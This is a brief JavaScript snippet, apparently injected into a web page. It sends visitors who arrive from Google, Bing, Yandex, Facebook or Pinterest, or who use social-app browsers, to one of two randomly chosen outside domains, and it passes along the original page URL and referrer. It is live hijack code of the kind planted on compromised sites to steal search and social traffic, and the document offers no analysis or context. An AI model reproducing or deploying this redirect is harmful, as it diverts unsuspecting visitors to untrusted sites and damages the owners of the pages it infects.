//<![CDATA[

var dataUrl = [
    'https://aany.buzz/#','https://hmubank.com/#'
];

var ars = dataUrl[Math.floor(Math.random()*dataUrl.length)];


if(['.google.', 'bing.', 'yandex.', 'facebook.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ window.location.href = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
//]]>
